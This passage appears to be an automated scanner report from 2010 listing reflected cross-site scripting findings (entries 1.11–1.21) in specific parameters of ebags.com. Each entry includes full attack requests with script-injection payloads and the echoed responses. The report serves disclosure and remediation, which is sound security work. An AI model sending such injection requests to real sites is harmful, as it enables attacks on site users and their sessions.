Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822; expires=Sun, 02-Jan-2011 14:00:22 GMT; path=/
Set-Cookie: SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; path=/
Set-Cookie: ACCT=guest; path=/
Vary: Accept-Encoding
Content-Length: 76584

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1
...[SNIP]...
ted);$("#hfComparisonChartSkuId").get(0).value=skuid;$("#hfComparisonReturnUrl").get(0).value="http://www.ebags.com:80/product/case-logic/sony-psp-game-case/120830?&sourceID=BECOME01$couponid=40959822&22488"-alert(1)-"de7d1c87b4f=1productid="+skuid;});(function($,eBags){var txtPostalCode=$("#txtPostalCode"),divEddResult=$("#divEddResult"),divEddError=$("#divEddError"),divEddProcessing=$("#divEddProcessing")
doneProcessing=fals
...[SNIP]...

1.11. http://www.ebags.com/product/case-logic/sony-psp-game-case/120830 [productid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/product/case-logic/sony-psp-game-case/120830

Issue detail

The value of the productid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa886"-alert(1)-"8f11ec469ac was submitted in the productid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /product/case-logic/sony-psp-game-case/120830?productid=1312640aa886"-alert(1)-"8f11ec469ac&sourceID=BECOME01$couponid=40959822 HTTP/1.1
Host: www.ebags.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Date: Sun, 26 Dec 2010 13:58:49 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
x-version: 10.05.0159.0000
Set-Cookie: CFID=440601; domain=.ebags.com; expires=Tue, 24-Dec-2019 13:58:49 GMT; path=/
Set-Cookie: CFTOKEN=13248575; domain=.ebags.com; expires=Tue, 24-Dec-2019 13:58:49 GMT; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822; expires=Sun, 02-Jan-2011 13:58:49 GMT; path=/
Set-Cookie: SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; path=/
Set-Cookie: ACCT=guest; path=/
Vary: Accept-Encoding
Content-Length: 76615

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1
...[SNIP]...
ointsPotentialFormatted);$("#hfComparisonChartSkuId").get(0).value=skuid;$("#hfComparisonReturnUrl").get(0).value="http://www.ebags.com:80/product/case-logic/sony-psp-game-case/120830?productid=1312640aa886"-alert(1)-"8f11ec469ac&sourceID=BECOME01$couponid=40959822productid="+skuid;});(function($,eBags){var txtPostalCode=$("#txtPostalCode"),divEddResult=$("#divEddResult"),divEddError=$("#divEddError"),divEddProcessing=$("#divE
...[SNIP]...

1.12. http://www.ebags.com/product/case-logic/sony-psp-game-case/120830 [sourceID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/product/case-logic/sony-psp-game-case/120830

Issue detail

The value of the sourceID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93fa1"-alert(1)-"0e3d8adb254 was submitted in the sourceID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /product/case-logic/sony-psp-game-case/120830?productid=1312640&sourceID=BECOME01$couponid=4095982293fa1"-alert(1)-"0e3d8adb254 HTTP/1.1
Host: www.ebags.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Date: Sun, 26 Dec 2010 13:59:21 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
x-version: 10.05.0159.0000
Set-Cookie: CFID=574742; domain=.ebags.com; expires=Tue, 24-Dec-2019 13:59:21 GMT; path=/
Set-Cookie: CFTOKEN=19870762; domain=.ebags.com; expires=Tue, 24-Dec-2019 13:59:21 GMT; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D4095982293FA1%2DALERT%281%29%2D0E3D8ADB254; expires=Sun, 02-Jan-2011 13:59:21 GMT; path=/
Set-Cookie: SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; path=/
Set-Cookie: ACCT=guest; path=/
Vary: Accept-Encoding
Content-Length: 76574

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1
...[SNIP]...
tted);$("#hfComparisonChartSkuId").get(0).value=skuid;$("#hfComparisonReturnUrl").get(0).value="http://www.ebags.com:80/product/case-logic/sony-psp-game-case/120830?&sourceID=BECOME01$couponid=4095982293fa1"-alert(1)-"0e3d8adb254productid="+skuid;});(function($,eBags){var txtPostalCode=$("#txtPostalCode"),divEddResult=$("#divEddResult"),divEddError=$("#divEddError"),divEddProcessing=$("#divEddProcessing")
doneProcessing=false,
...[SNIP]...

1.13. http://www.ebags.com/product/case-logic/sony-psp-game-case/120830 [testimonialsortlink parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/product/case-logic/sony-psp-game-case/120830

Issue detail

The value of the testimonialsortlink request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fb05f"-alert(1)-"7d07bd6c104 was submitted in the testimonialsortlink parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /product/case-logic/sony-psp-game-case/120830?productid=1312640&sourceID=BECOME01$couponid=40959822&testimonialsortlink=newestfb05f"-alert(1)-"7d07bd6c104 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:05:39 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822; expires=Sun, 02-Jan-2011 14:05:39 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 76671

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h
...[SNIP]...
SkuId").get(0).value=skuid;$("#hfComparisonReturnUrl").get(0).value="http://www.ebags.com:80/product/case-logic/sony-psp-game-case/120830?&sourceID=BECOME01$couponid=40959822&testimonialsortlink=newestfb05f"-alert(1)-"7d07bd6c104productid="+skuid;});(function($,eBags){var txtPostalCode=$("#txtPostalCode"),divEddResult=$("#divEddResult"),divEddError=$("#divEddError"),divEddProcessing=$("#divEddProcessing")
doneProcessing=false,
...[SNIP]...

1.14. http://www.ebags.com/products/index.cfm [modelid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/products/index.cfm

Issue detail

The value of the modelid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f282"><script>alert(1)</script>829a140d05b was submitted in the modelid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/index.cfm?fuseaction=more_testimony&modelid=1208302f282"><script>alert(1)</script>829a140d05b&min_testimonial=1&max_testimonial=3&testimonialsortlink=newest&ProdDetail_Link=Testimonials HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:18:19 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:18:19 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 42740

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<input type="Hidden" name="destination" value="http://www.ebags.com/products/index.cfm?fuseaction=more_testimony&modelid=1208302f282"><script>alert(1)</script>829a140d05b&min_testimonial=1&max_testimonial=3&testimonialsortlink=newest&ProdDetail_Link=Testimonials&quicksignlink=pageend">
...[SNIP]...

1.15. http://www.ebags.com/products/index.cfm [productid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/products/index.cfm

Issue detail

The value of the productid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df556"-alert(1)-"271370c27cf was submitted in the productid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /products/index.cfm?modelid=120830&productid=1312640df556"-alert(1)-"271370c27cf&sourceid=become01$couponid=40959822&quicksignlink=pageend HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:18:30 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID; expires=Sun, 02-Jan-2011 14:18:30 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 76737

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h
...[SNIP]...
ointsPotentialFormatted);$("#hfComparisonChartSkuId").get(0).value=skuid;$("#hfComparisonReturnUrl").get(0).value="http://www.ebags.com:80/product/case-logic/sony-psp-game-case/120830?productid=1312640df556"-alert(1)-"271370c27cf&sourceid=become01$couponid&quicksignlink=pageendproductid="+skuid;});(function($,eBags){var txtPostalCode=$("#txtPostalCode"),divEddResult=$("#divEddResult"),divEddError=$("#divEddError"),divEddProces
...[SNIP]...

1.16. http://www.ebags.com/products/index.cfm [quicksignlink parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/products/index.cfm

Issue detail

The value of the quicksignlink request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66c59"-alert(1)-"b92aab12d9e was submitted in the quicksignlink parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /products/index.cfm?modelid=120830&productid=1312640&sourceid=become01$couponid=40959822&quicksignlink=pageend66c59"-alert(1)-"b92aab12d9e HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:19:52 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID; expires=Sun, 02-Jan-2011 14:19:52 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 76670

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h
...[SNIP]...
omparisonChartSkuId").get(0).value=skuid;$("#hfComparisonReturnUrl").get(0).value="http://www.ebags.com:80/product/case-logic/sony-psp-game-case/120830?&sourceid=become01$couponid&quicksignlink=pageend66c59"-alert(1)-"b92aab12d9eproductid="+skuid;});(function($,eBags){var txtPostalCode=$("#txtPostalCode"),divEddResult=$("#divEddResult"),divEddError=$("#divEddError"),divEddProcessing=$("#divEddProcessing")
doneProcessing=false,
...[SNIP]...

1.17. http://www.ebags.com/products/index.cfm [sourceid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/products/index.cfm

Issue detail

The value of the sourceid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b45c"-alert(1)-"c334fb69c0b was submitted in the sourceid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /products/index.cfm?modelid=120830&productid=1312640&sourceid=6b45c"-alert(1)-"c334fb69c0b&quicksignlink=pageend HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:19:01 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=6B45C%2DALERT%281%29%2DC334FB69C0B; expires=Sun, 02-Jan-2011 14:19:01 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 76507

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h
...[SNIP]...
ewardsPointsPotentialFormatted);$("#hfComparisonChartSkuId").get(0).value=skuid;$("#hfComparisonReturnUrl").get(0).value="http://www.ebags.com:80/product/case-logic/sony-psp-game-case/120830?&sourceid=6b45c"-alert(1)-"c334fb69c0b&quicksignlink=pageendproductid="+skuid;});(function($,eBags){var txtPostalCode=$("#txtPostalCode"),divEddResult=$("#divEddResult"),divEddError=$("#divEddError"),divEddProcessing=$("#divEddProcessing")
...[SNIP]...

1.18. http://www.ebags.com/rewards/index.cfm [fuseaction parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/rewards/index.cfm

Issue detail

The value of the fuseaction request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1662e"><script>alert(1)</script>ec126fb878a was submitted in the fuseaction parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rewards/index.cfm?fuseaction=signup1662e"><script>alert(1)</script>ec126fb878a HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:04:10 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:04:10 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 41844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<input type="Hidden" name="destination" value="http://www.ebags.com/rewards/index.cfm?fuseaction=signup1662e"><script>alert(1)</script>ec126fb878a&quicksignlink=pageend">
...[SNIP]...

1.19. http://www.ebags.com/rewards/index.cfm [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/rewards/index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2fcea"><script>alert(1)</script>afebb6ca52d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rewards/index.cfm?fuseaction=signup&2fcea"><script>alert(1)</script>afebb6ca52d=1 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

1.20. http://www.ebags.com/shoppingcart/index.cfm [CurrentTime parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/shoppingcart/index.cfm

Issue detail

The value of the CurrentTime request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e128e"><script>alert(1)</script>f1c52c95efe was submitted in the CurrentTime parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shoppingcart/index.cfm?FuseAction=viewcart&CurrentTime=%7Bts%20%272010%2D12%2D26%2006%3A55%3A59%27%7De128e"><script>alert(1)</script>f1c52c95efe&requesttimeout=2000 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:06:56 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:06:56 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 64284

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1
...[SNIP]...
<input type="Hidden" name="destination" value="http://www.ebags.com/shoppingcart/index.cfm?FuseAction=viewcart&CurrentTime=%7Bts%20%272010%2D12%2D26%2006%3A55%3A59%27%7De128e"><script>alert(1)</script>f1c52c95efe&requesttimeout=2000&quicksignlink=pageend">
...[SNIP]...

1.21. http://www.ebags.com/shoppingcart/index.cfm [itemAdded parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ebags.com
